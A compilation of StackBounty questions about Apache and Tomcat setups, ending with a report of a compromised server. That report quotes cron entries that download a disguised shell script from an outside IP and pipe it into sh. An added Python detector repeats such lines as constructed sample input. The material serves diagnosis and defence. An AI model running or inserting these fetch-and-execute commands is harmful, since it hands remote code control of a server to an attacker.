#StackBounty: #webserver #apache #ddos Is mod_reqtimeout a sufficient and safe technique to mitigate Slow HTTP DoS Attacks?

Bounty: 50

We’ve been looking into configuring Apache against the Slow HTTP DoS attacks and stumbled upon this article, which goes over multiple techniques and Apache configuration options.

mod_reqtimeout module looks promising and we are considering enabling it, but not everything is clear about it at the moment:

  • what header, body and minRate settings are considered best practices and what things should we take into account when choosing the values?
  • can enabling mod_reqtimeout potentially impact web applications running on this web server? And, if yes, what possible problems should we expect?



#StackBounty: #apache #.htaccess #redirect htaccess if url contains string redirect to page without changing url

Bounty: 50

I have a URL like domain.co.uk/product-name.html

I want to redirect any URLs that contain the string html to search.php, but I want to keep the original URL that was typed in, so if domain.co.uk/product-name.html was redirected to search.php it should still show domain.co.uk/product-name.html in the browser.

I am using:

RewriteCond %{REQUEST_URI} html
RewriteRule .* search.php

Which redirects but does not keep the original typed URL in the browser.

How can I do this?



#StackBounty: #ruby-on-rails #apache #ubuntu #capistrano #passenger Passenger doesn't seem to be running (Capistrano/Rails/Apache/U…

Bounty: 50

Deploying a Rails app using Capistrano to an Ubuntu VM running Apache with Passenger enabled.

I followed this tutorial: https://www.phusionpassenger.com/library/install/apache/install/oss/trusty/ with a few changes given that I’m on 17.04, not 14.04 LTS.

passenger-config validate-install says everything looks fine with both Passenger and Apache. passenger-memory-stats shows both Passenger and Apache processes.

I have sudo apache2ctl restarted several times, with no warnings. But passenger-status, and therefore the passenger-config restart-app that Capistrano runs, reports that Passenger “doesn’t seem to be running.” So my deploy stops.

There’s only one Ruby on the machine, ruby-2.4.1 installed using ruby-install. I have apt-get update and upgraded in case of version mismatches.

Apache logs don’t show any errors, certainly none related to Passenger.

Why would Passenger internally disagree, saying that it’s both configured properly and there are processes running, but then later saying that it’s not running?



#StackBounty: #node.js #apache #socket.io #phpwebsocket #phpws Trying to create a socket between servers with SocketIO and PHPws

Bounty: 50

I’m having a bit of an issue with websockets. So, I have a Rpi that provides me some data through a socketIO client in a pretty simple way. The following code shows how I get this data:

<!DOCTYPE html>
<html>
<head>
    <title>SocketIO test</title>
    <script src="http://192.168.5.5:8000/socket.io/socket.io.js"></script>
</head>
<body>
    <script>
        var client = io.connect('http://192.168.5.5:8000');
        client.on('connect', function() {
            console.log('connected');
        });
        client.on('raw', function(data){
            console.log(data);
        });
        client.on('state', function(data){
            console.log(data);
        });
    </script>
</body>
</html>

However, what I need to implement is a little bit more complex. I need to use an Apache server to treat some of the data before it gets to the client side. The following image shows what I attempt to build:

[image: diagram not included]

To reach my goal I tried several WebSocket Servers and Client libraries for PHP until I found PHPws, which looks like the best solution for my scenario.
So, I read the examples, tested them, and everything went well until I tried to connect to the Rpi with the following code:

<?php
require_once("../vendor/autoload.php");
$loop = \React\EventLoop\Factory::create();
$logger = new \Zend\Log\Logger();
$writer = new \Zend\Log\Writer\Stream("php://output");
$logger->addWriter($writer);

$client = new \Devristo\Phpws\Client\WebSocket("ws://192.168.5.5:8000", $loop, $logger);
$client->on("connect", function() use ($logger, $client){
    $logger->notice("Or we can use the connect event!");
    $client->send("Hello world!");
});
$client->on("raw", function($message) use ($client, $logger){
    $logger->notice("Got message: ".$message->getData());
    $client->close();
});
$client->open()->then(function() use($logger, $client){
    $logger->notice("We can use a promise to determine when the socket has been connected!");
});
$loop->run();

I’ve more or less taken this example from Devristo’s GitHub.

From the server side, the execution of the program is not throwing any error or message.

Is it possible to build what I want to build here with PHPws?
If so, am I connecting properly to the Rpi server with the PHPws sample code shown?



#StackBounty: #apache #http-status-code-403 #plesk Random 403 error with apache 2.2 and Plesk 12.5

Bounty: 50

I face a strange random 403 error on a Debian server with Plesk 12.5 and Apache 2.2.

There are several domains on the server but only one domain faces this.

Randomly, it seems that it tries to display the directory listing instead of serving the index.php file. So, sometimes, it throws a 403 error, and when I refresh the page, it’s OK with a 200 status.

In error_log, I read lots of:

[error] [client xxx.xxx.xxx.xxx] Directory index forbidden by Options directive

The DirectoryIndex was not present in httpd.conf file so I added the rule in additional directives for the domain via the Plesk Web Interface with no luck.

I’m kind of stuck with this.

Any help would be appreciated.

Let me know if you need more info.

Thank you.



#StackBounty: #php #apache #http-status-code-403 #fpm Random 403 errors with apache+php-fpm

Bounty: 100

On a server of mine, running Ubuntu 14.04.5 with Apache 2.4.23 and php-fpm 7.0.11, I’m getting random 403 errors.

I say “random” because the pages I see in the logs with 403 run fine when I try them. Also, I experienced directly (I mean by visiting a site on the server with my browser) that I got a 403 error, then retried (just refreshing) and I got a 200.

The server is running some websites (about a dozen), with various kinds of solutions (a couple of WordPress, a few old spaghetti PHP apps, mostly modern apps based on the Symfony framework).

I’d also be happy if someone can point me to some way to increase the verbosity of some logs, to try resolving this issue by myself. Currently I see the 403 errors in the Apache logs of vhosts.



#StackBounty: #apache #polymer Polymer app not loading when using Apache reverse proxy

Bounty: 50

I have a Polymer app running on port 5901 of my VM, and am using Apache reverse proxy to serve the app from the following URL:

http://www.example.com/polymer

The problem is when I go to the URL in a browser, I can see the page title but the page is blank. I also get this error in the console:

Failed to load resource: the server responded with a status of 404 (Not Found)   src/home-page.html

I’m assuming that I have to somehow add the /polymer subdomain to the default URL for the app, but I’m not sure how to do this.



#StackBounty: #php #apache #caching #xampp How to disable Apache caching in Apache-XAMPP?

Bounty: 50

I am having this weird problem with my XAMPP-Apache.
I am making a log-in system where a form is posted to the redirect.php page.
I updated redirect.php, but it is still showing me the same old result.
There is not even a single line to redirect (header fn call) it to another page, but it still redirects to the home.php page as it was doing in the older script.
I tried clearing the cache of my browser and changing the browser for testing, but that didn’t work… I even tried rebooting the server, but no change.
Please help me through…



#StackBounty: #linux #apache #shell #security #tomcat Shell script attack on Apache server, via a cron job of unknown origin

Bounty: 50

While running a project WAR on an Apache Tomcat server I found that the server has been compromised.

While running the WAR, an unknown cron job is running like this:

[root@PaygateApp2 tmp]# crontab -l -u tomcat
*/11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh
*/12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh

The downloaded logo.jpg contains a shell script which downloads malware.

I found a similar issue on the websites below:

https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/

and

https://security.stackexchange.com/questions/160068/kworker34-malware-on-linux

I am unable to find the origin of this cron job scheduler in my whole code.

This cron job

What I wish to know is whether anyone has faced this issue, and how I should go about finding the origin of the cron job in code.

Note:

I am working on a JAVA(Struts 2)+jsp+javascript+jquery web project.

This cron job is running every time I start my Tomcat with the WAR file of the project, but I am not able to find any scheduler for the cron job in my code.
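
The two crontab entries in the question share one signature: a downloader whose output is piped straight into a shell, with the URL dressed up as an image. The following is an added example, not part of the original question, that audits crontab text for that pattern; `audit_crontab` and `command_of` are hypothetical helper names, and the sample lines are constructed (192.0.2.10 is a documentation address).

```python
import re

# A downloader (wget/curl) whose output is piped into a shell interpreter.
FETCH_PIPE_SHELL = re.compile(
    r"\b(wget|curl)\b[^|;&]*\|\s*(?:sudo\s+)?(?:/\S*/)?(sh|bash|dash|ksh|zsh)\b")
URL = re.compile(r"https?://[^\s|;'\"]+")
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")
ENV_ASSIGNMENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*\s*=")

# Constructed sample input; 192.0.2.10 is a documentation (TEST-NET-1) address.
SAMPLE = """\
# sample user crontab
MAILTO=root
*/11 * * * * wget -O - -q http://192.0.2.10/pics/logo.jpg|sh
*/12 * * * * curl http://192.0.2.10/pics/logo.jpg|sh
0 3 * * * /usr/local/bin/backup.sh | logger -t backup
@daily curl -s https://example.org/status -o /tmp/status.json
"""


def command_of(line):
    """Return the command of a user crontab line; None for non-job lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_ASSIGNMENT.match(line):
        return None
    # "@reboot cmd" has one schedule field, a normal entry has five.
    fields = 1 if line.startswith("@") else 5
    parts = line.split(None, fields)
    return parts[fields] if len(parts) > fields else None


def audit_crontab(text, user="unknown"):
    """Flag jobs that pipe a download into a shell (hypothetical helper)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        command = command_of(line)
        match = FETCH_PIPE_SHELL.search(command) if command else None
        if not match:
            continue
        urls = URL.findall(command)
        findings.append({
            "user": user, "line": lineno,
            "tool": match.group(1), "shell": match.group(2), "urls": urls,
            # An "image" URL fed to a shell is a strong disguise indicator.
            "image_url": any(u.lower().endswith(IMAGE_EXT) for u in urls),
        })
    return findings


if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE, user="tomcat"):
        print(finding)
```

Run it over the output of `crontab -l -u <user>` for every account on the host, service accounts such as tomcat included, and treat any hit as a reason to review what that account's processes are allowed to execute.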

